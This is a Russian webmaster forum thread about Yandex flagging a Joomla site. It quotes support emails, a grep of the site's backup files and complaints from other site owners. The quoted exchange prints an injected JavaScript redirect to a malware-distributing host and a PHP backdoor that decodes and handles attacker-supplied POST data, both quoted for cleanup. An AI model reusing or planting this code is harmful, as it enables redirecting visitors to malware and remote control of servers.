>  Просим Вас высказать свое мнение о полученном ответе: http://feedback2.yandex.ru/appraisal.xml?session=6b7b901d04246c7d19b3859e46c25248be7c854a-26756248-56532020
>
>  С уважением, Платон Щукин
>  Служба поддержки Яндекса
http://help.yandex.ru/
>
>  Александр <alexpda@ya.ru> написал(а):
>>   Ну не совсем так.
>>   Давайте по порядку.
>>   1. "Справедливости ради отмечу, что чужеродный код был найден мною на сайте ( ночь 5-6 мая)."
>>   Чем лечил и что.
>>   Запустил скрипт AiBolit, который и навел на наличие цифра-буква.php файлов.
>>   Нашел их все и удалил. Ни в какой код не лазил.
>>   Яндекс сказал, что сайт чист.
>>
>>   2. После Вашего письма засомневался.
>>   Поднял архив на хостинге от 5 числа 11-43.
>>   Нет там этого кода,
>>   Search "/*214afaae*/(function(){" (0 hits in 0 files)
>>   Search "var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ))" (0 hits in 0 files)
>>   Search "undeletesitessuch.ru" (0 hits in 0 files)
>>   Search "!papirosa" (0 hits in 0 files)
>>   Search " if (!papirosa()) {" (0 hits in 0 files)
>>   Search "*214afaae*/(function(){" (0 hits in 0 files)
>>   Search "function stripos (f_haystack, f_needle, f_offset) {" (0 hits in 0 files)
>>   а вот тот который рекомендуется удалить, чтобы повторно не заразиться в тех же  файлах типа \b39d4192.php
>>
>>   Search "@base64" (53 hits in 53 files)
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_advancedmodules\models\158c1.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_advancedmodules\models\b94b1bea74.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_akeeba\akeeba\core\8a676e.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_akeeba\views\browser\tmpl\973d4b.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_banners\models\forms\d267de5.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_banners\views\download\tmpl\6258e2a12.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_chronoforms\form_actions\authenticator\8ee0e.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_chronoforms\form_actions\autocomplete_processor\5035f9f3.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_chronoforms\form_actions\load_js\2a4ec7.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_finder\sql\2458df.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_installer\views\manage\09aa6234.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_installer\views\warnings\46752.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_jce\views\installer\70667.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_jcomments\tables\3a6b17f83c.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_media\models\f200.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_menus\models\forms\086e318322.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_menus\views\menu\9e5f.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_myrssreader\views\about\374fd56b5.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_phocaguestbook\views\phocaguestbook\tmpl\8556552fb.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_plugins\models\f3c75b.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_templates\views\style\tmpl\41d220e1.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_xmap\models\fields\44dce0da.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\components\com_zhyandexmap\tables\a7d20f.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\language\en-GB\d505787.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\modules\mod_docman_top\b3ae6106.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\modules\mod_latest\tmpl\0ad71.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\templates\hathor\html\com_installer\manage\088b910fac.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\templates\hathor\html\com_redirect\16ea.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\templates\hathor\html\com_templates\af4a.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\templates\hathor\html\com_users\3ad53551.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\administrator\templates\hathor\html\com_users\debuggroup\50a2afc.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_docman\themes\d99c522cb.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_docman\themes\default\language\131cf7d.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_docman\views\docman\tmpl\fd098.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_jce\editor\tiny_mce\plugins\autolink\2166e87.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_jce\editor\tiny_mce\plugins\browser\classes\4991e8c13.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_jce\editor\tiny_mce\plugins\format\13ba457da.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_jce\editor\tiny_mce\plugins\visualchars\classes\2d2103.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_users\views\reset\tmpl\0b409a7.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\components\com_xmap\views\html\629b844b8a.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\libraries\joomla\document\b4c0694e.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\libraries\joomla\mail\526500.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\media\editors\tinymce\jscripts\tiny_mce\plugins\advimage\764c5e.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\media\editors\tinymce\jscripts\tiny_mce\plugins\autosave\924ea68.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\media\mod_jcomments_latest_commented\css\ec49.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\media\overrider\js\bf0c4172.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\modules\mod_chronoforms\d0de69712.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\modules\mod_docman_latestdown\db978f2e8.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\plugins\content\jcomments\cb8e77.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\plugins\finder\contacts\6f449.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\plugins\system\tooltips\js\b39d4192.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\plugins\xmap\com_kunena00\74ec6c48da.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>     C:\Documents and Settings\administrator\Рабочий стол\Новая папка (9)\2013-05-05_11-43-14-MyDOMEN.ru\templates\beez5\javascript\3fd2.php (1 hit)
>>           Line 3: if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>
>>   Поскольку этот архив сайта создан до "лечения" AiBolit и моими кривыми руками, полагаю, что картина достаточно объективна и полностью подтверждает правомочность моих выводов в  блоге Safesearch.
>>
>>   Нет никаких доказательств, что этот код (/*214afaae*/(function(){...) был обнаружен на моем сайте.
>>
>>   На самом деле вопрос не в доказательстве моей или Вашей правоты, а в тех последствиях, к которым  приводят действия и решения Яндекса, принимаемые на столь неопределенных основаниях.
>>
>>   Я так ни разу и не услышал ответа , извинений, и решения проблемы отключения не зараженных сайтов, только на том основании, что они находятся в одном домене с "подозрительным"
>>
>>   С уважением, Александр
>>
>>   07.05.2013, 16:49, "Yandex.Search support" <support@search.yandex.com>:
>>>    Здравствуйте, Александр!
>>>
>>>    На Вашем сайте был обнаружен следующий код:
>>>
>>>    /*214afaae*/(function(){
>>>    function stripos (f_haystack, f_needle, f_offset) {
>>>    var haystack = (f_haystack + '').toLowerCase();
>>>    var needle = (f_needle + '').toLowerCase();
>>>    var index = 0;
>>>    if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
>>>    return index;
>>>    }
>>>    return false;
>>>    }
>>>    function papirosa(){
>>>    var denyList = ['Chrome'];
>>>    var denyUA = false;
>>>    for (var i in denyList) {
>>>    if (stripos(navigator.userAgent, denyList[i])) {
>>>    denyUA = true;
>>>    break;
>>>    }
>>>    }
>>>    return denyUA;
>>>    }
>>>    function setCookie(name, value, expires) {
>>>    var date = new Date( new Date().getTime() + expires*1000 );
>>>    document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
>>>    }
>>>    function getCookie(name) {
>>>    var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
>>>    return matches ? decodeURIComponent(matches[1]) : undefined;
>>>    }
>>>    if (!papirosa()) {
>>>    var cookie = getCookie('b19ad018sc');
>>>    if (cookie == undefined) {
>>>    setCookie('b19ad018sc', true, 292200);
>>>    document.write('http://undeletesitessuch.ru/jcnvftd.iHDUhxK?default">');
>>>    }
>>>    };
>>>    })();/*eaa795220*/
>>>
>>>    о чем я написал Вам в предыдущем письме, именно по этому Ваш сайт и был помечен как угрожающий опасности. Тем более Вы же сами писали на блоге Safesearch, что "Справедливости ради отмечу, что чужеродный код был найден мною на сайте ( ночь 5-6 мая)."
>>>
>>>    --
>>>    Просим Вас высказать свое мнение о полученном ответе: http://feedback2.yandex.ru/appraisal.xml?session=1379ad5c5614e5b9b81a7cc2755208dd7c8e9e6b-26756248-56513934
>>>
>>>    С уважением, Платон Щукин
>>>    Служба поддержки Яндекса
>>>    http://help.yandex.ru/
>>>
>>>    Александр <alexpda@ya.ru> написал(а):
>>>>     Здравствуйте.
>>>>
>>>>        105. Troj/JSRedir-LH
>>>>
>>>>         Данный вердикт означает, что в разметке страницы присутствует подгрузка JavaScript-кода (имена переменных и функций могут отличаться для каждого конкретного скрипта), который после выполнения перенаправляет пользователя на сайт, распространяющий вредоносное ПО. Как правило в данном случае заражения сайта указанный код дописывается в начало всех js файлов на сайте.
>>>>
>>>>     Поиск по всем текстам  в зараженной копии сайта
>>>>     Document.write('>>>>     scr="http://                     - нет результата
>>>>     Что означает , что в разметке страницы НЕ присутствует подгрузка JavaScript-кода
>>>>
>>>>     Ищем далее:
>>>>     (@base64_decode -  Найден в 14 отдельных файлах типа 6258e...php
>>>>     код следующий
>>>>     >>>>     if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
>>>>     if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
>>>>       echo 'bg';
>>>>       exit;
>>>>     }}
>>>>     ?>
>>>>     Что означает, что эту гадость следует удалить, во избежание заражения.
>>>>
>>>>     Таким образом, сайт еще не был заражен и паразитный код еще не был внедрен в страницы сайта а я уже получил "Черную метку" на все сайты в моем домене.
>>>>     Забавный способ предупреждения об опасности выбран Яндексом!
>>>>
>>>>     07.05.2013, 13:01, "Yandex.Search support" <support@search.yandex.com>:
>>>>>     Здравствуйте, Александр!
>>>>>
>>>>>     На Вашем сайте 4 марта было обнаружен вредоносный код с вердиктом Troj/JSRedir-LH . Вредоносный код который подставлялся в js-файлы и серверный код, который присутствует в php файлах, приведены на странице Помощи: http://help.yandex.ru/webmaster/?id=1116573#1127875 . В настоящий момент Ваш сайт прошёл перепроверку и не помечен как угрожающий безопасности компьютера.
>>>>>
>>>>>     Система устроена так, что при обнаружении вредоносного кода на домене его поддомены также помечаются в результатах поиска.Введите текст цитаты

С уважением...

Не верить, жаловаться, призывать – ваше право. А у пользователей есть право работать на компьютере без вирусов. Поэтому пока на сайте есть вредоносный код – мы будем его находить и предупреждать пользователей о том, что из-за него их компьютеры могут заразиться. Для того, чтобы и у вас получилось найти и удалить вредоносный код, есть разделы Помощи и Вебмастера, о которых мы уже очень много раз писали.

За владельца сайта техническая поддержка Яндекса его сайт не вылечит, да вообще-то и не обязана. К нам очень многие обращаются, и вместо того, чтобы тратить время на споры, мы лучше поможем тем, кто занимается удалением вредоносного кода со своего сайта и устраняет причины его появления.

Вот интересно представители Яндекса абсолютно уверены в своей непогрешимости? Никакие аргументы не способны заставить Вас усомниться?

Но да ладно, как бы уже и не надеюсь, поскольку более доказательно отвечать, на просто слова трудно.

Я то не воплю, а и сайт вылечил, и даже разобрался что там было, более того есть резервная копия на хостинге, созданная на момент обнаружения, по которой можно точно убедиться в добросоветсности моих слов.

А вот Яндекс - "сплошная защита мундира".

Но, согласен, заражения регулярны, все бывает и трудно контролируется.

 

Вопрос ведь в том как себя ведет Яндекс в тяжелую годину.

 

Дайте конкретный ответ, на конкретный вопрос:


Является ли клеветой навешивание ярлыка "Опасный сайт" на чистый и не зараженный (по мнению того же Яндекса) сайт, только на том основании , что он находиться в том же домене, что и "подозрительный" ?

Цитирую ответ из переписки с техподдержкой Яндекса, на всякий случай::-)

    

Система устроена так, что при обнаружении вредоносного кода на домене его поддомены также помечаются в результатах поиска."

задоблался уже чистить сайт. Только почистию, не пройдет и месяца, сново весточка приходит на почту - "Ваш сайт помечен, как вирусный" - уже и антивирусы не находят, где зараза сидит. Весь сайт сбэкапил, проверил 4 антивирами - хоть бы намек был :( Вот теперь ручками, ручками 4 гига надо сканить, каждый файлик, что бы найти левый код на сайте.

Ушло 3 часа пока нашел вирусы, оказались в папках:

tmp

logs

xmlp

bace 64*

Яндекс оказался прав. Только, вот почему антивирусы не нашли :( из чего пришлось ручками работать. 

Та же фигня, что и у всех остальных. Пришлось обращаться к коллегам-програмистам. Они некий код нашли, но в шаблоне страницы 404. Вопрос: каким тогда местом этот код мог попадать на остальные страницы сайта? Если бы код находился в плагине или в шапке/футере/сайдбаре - понимаю. А так - какой-то бред. Следует ли говорить, что все остальные антивирусники ничего не обнаружили?
Рекламу на Яндексе покупать больше не буду. Вечно что-то придумывают, а потом понимают, какую глупость делают.

НУ вот. Через день после того, как вроде как что-то нашли и удалили, и Яндекс убрал свои предупреждения, опять тоже самое! Это какой-то бред!!! Что за "Поведенческий анализ" на фиг??

И как вам вот такой признак "зараженности": "Посторонние элементы ,

Добрый день народ! SOS SOS SOS  
у меня тоже такая же фигня, вот 2 месяц  , ни как немогу понять что за вредный код, проверил онлайн версиями пишет что всё чисто, но всё равно "яшка"ругается
что делать незнаю 

1) http://help.yandex.ru/webmaster/?id=1127486
2) http://help.yandex.ru/webmaster/?id=1116613
Именно в таком порядке, иначе может вредоносный код могут успеть восстановить.

Доколе нам тыкаться как слепые котята в поисках не знамо чего?!

И это в век нанотехнологий и дерзких инноваций ?!

 Рекомендую на редкость полезный инструмент для поиска заразы всякой

 Вот этим можно проверить сайт и узнать много нового http://www.revisium.com/ai/

(Учтите : многие знания - многие печали! )

 P.S.

Если время выполнения скриптов у хостера ограничено на столько, что этот скрипт не успевает выполниться, помогает создание задания и выполнение  через cron.

 

Сюда же в тему :

 Cкрипт для постоянного мониторинга изменений файлов на сервере.

 http://www.skillz.ru...nii_faylov.html

Добрый день. У нас как специалистов уже достаточно большой опыт по очистке сайтов от вирусов! Хитростей хакеры использют очень много.

Почистили уже более 200 проектов.

Если вам важно быстро восстановить рабоспособность сайта - обращайтесь к специалистам нашей команды.

Можно просто набрать в интернете: веб студия миллор

или связаться с нами по телефону 8800 555-37-52

Посторонние элементы – это такие, которые добавили не вы.

Если вредоносный код удалили, а потом он снова появился – значит, вы не устранили причину заражения. Например, серверный бэкдор, слабый пароль, вирус-формграббер на компьютере у вебмастера, уязвимость CMS или её плагина.

Яндекс добивается того, чтобы:
1) у пользователей на компьютерах не было вирусов и их не обманывали различные мошенники – хотя бы у тех, кто пользуется сервисами и браузерами Яндекса и его партнёров;
2) вебмастера удаляли со своих сайтов вредоносный код;
3) на сайтах интернета была полезная информация, а не только вирусы, фишинг, мобильные редиректы и смс-мошенничество, так, чтобы пользователи не боялись интернетом пользоваться.

Если бы ваше оценочное суждение было обоснованным, оно было бы намного более ценным.

Уважаемый Александр, если бы ваш славный антивирус не общался с вебмастерами обобщенными фразами, типа "Поведенческий анализ", а писал: такой-то документ такая-то строка - это было бы, цитирую, "обоснованно" и "намного более ценно". А у вас - пойди туда не знаю куда найди то не знаю что чего вообще-то там скорее всего нет. Если у вас такой неземной антивирус стоит, который с лихвой обходит все остальные существующие, в чем сложность сообщить конкретные данные, а не ссылаться на обобщенные советы и обобщенные диагнозы. Вы говорите - сайт заражен, я говорю - нет не заражен. Все, к этому сводятся все диалоги здесь. Ваше слово против слова вебмастера и никаких доказательств.
Если вы считаете, что ваша система работает без косяков, тогда помогите нам, глупым слепым котятам, подсказывайте, где же вирус то засел, какие такие файлы обнаружил ваш антивирус.

Знаете, что меня больше всего убивает? То, что Яндекс.Бар постоянно пытается влезть к тебе в браузер, хочешь ты его или не хочешь. Так что еще является вирусом???

Может коллективную жалобу в прокуратуру?

Пускай "сами знаете кто", "чьё имя нельзя называть" хоть трактат напишет о том, что не несёт ответственности, всё-таки мы все находимся в правовом поле:

Статья 128.1. Клевета

[Уголовный кодекс РФ] [Глава 17] [Статья 128.1]

1. Клевета, то есть распространение заведомо ложных сведений, порочащих честь и достоинство другого лица или подрывающих его репутацию, -

наказывается штрафом в размере до пятисот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до шести месяцев либо обязательными работами на срок до ста шестидесяти часов.

2. Клевета, содержащаяся в публичном выступлении, публично демонстрирующемся произведении или средствах массовой информации, -

наказывается штрафом в размере до одного миллиона рублей или в размере заработной платы или иного дохода осужденного за период до одного года либо обязательными работами на срок до двухсот сорока часов.

3. Клевета, совершенная с использованием своего служебного положения, -

наказывается штрафом в размере до двух миллионов рублей или в размере заработной платы или иного дохода осужденного за период до двух лет либо обязательными работами на срок до трехсот двадцати часов.

 

Все три пункта нам подходят, особенно п.2

Просто для информации, существует и ст. 273.

Александр, у вас неверная информация.

Вот поймают гнусов создающих , распостраняющих вредоносные программы да еще и группой лиц, им и будете 273 статью предъявлять.

А мы тут из категории потерпевших, и в том числе от Яндекса.

Так , что статейка то 128.1 самое то в нашем контексте :D

Вы же сами написали, что вылечили сайт. Значит, пострадавшие в данном случае – исключительно пользователи, компьютеры которых заражались при просмотре вашего сайта, пока вы его не вылечили.

Мы идем по второму кругу. Как в переписке с техподержкой есть ощущение, что Вы читаете только то, что позволяет "зацепиться" и отфутболить.

В моем случае.

Яндекс нашел файлы - следы неудавшегося зарражения ГОДИЧНОЙ давности и среагировал на них. Никакого кода в страницах не было.

То есть Яша сработал как файловый антивирус, найдя подозрительные файлы на диске.

Просто удаление этих файлов скопом и было лечением, удовлеторившим Ваш антивирус. В коде страниц не менялось НИЧЕГО.

До сих пор сайт чист.

